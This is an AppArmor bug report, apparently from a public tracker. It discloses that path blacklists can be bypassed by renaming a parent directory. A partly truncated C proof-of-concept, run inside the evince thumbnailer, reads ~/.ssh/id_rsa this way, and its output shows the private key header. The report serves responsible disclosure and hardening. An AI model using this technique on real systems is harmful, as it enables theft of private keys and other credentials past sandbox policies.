filesystem blacklisting can be bypassed by moving parents
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
AppArmor |
Confirmed
|
Undecided
|
Unassigned |
Bug Description
I'm not sure whether this counts as just a hardening bug or a security bug for you, so I'm marking it as a security bug for now; please make this bug public if you don't think it qualifies as a security bug.
Some AppArmor policies attempt to blacklist access to specific directories while broadly granting write access to everything else. For example, the Firefox profile uses the user-files abstraction, which broadly permits write access to owned files under /home while using the private-files abstraction to block access to some files like ~/.bashrc. Similar thing for the evince thumbnailer.
This is broken because if an attacker has write access to ~/.ssh/, but access to ~/.ssh/** is blocked, it is possible to rename ~/.ssh to ~/.ssh_, access ~/.ssh_/id_rsa, and rename ~/.ssh_ back to ~/.ssh.
Demo with evince:
user@ubuntu-
#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <err.h>
__attribute_
printf(
errno = 0;
int fd = open("/
printf("open id_rsa direct: %d, error = %m\n", fd);
if (rename(
err(1, "rename");
errno = 0;
fd = open("/
printf("open id_rsa indirect: %d, error = %m\n", fd);
if (rename(
err(1, "rename2");
char buf[1001];
errno = 0;
int res = read(fd, buf, 1000);
printf("read res: %d, error = %m\n", res);
if (res > 0) {
buf[res] = 0;
puts(buf);
}
exit(0);
}
user@ubuntu-
constructor running from evince-thumbnailer
open id_rsa direct: -1, error = Permission denied
open id_rsa indirect: 3, error = Success
read res: 1000, error = Success
-----BEGIN RSA PRIVATE KEY-----
[...]
user@ubuntu-
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
Changed in apparmor: | |
status: | New → Confirmed |
yep, this should be well known.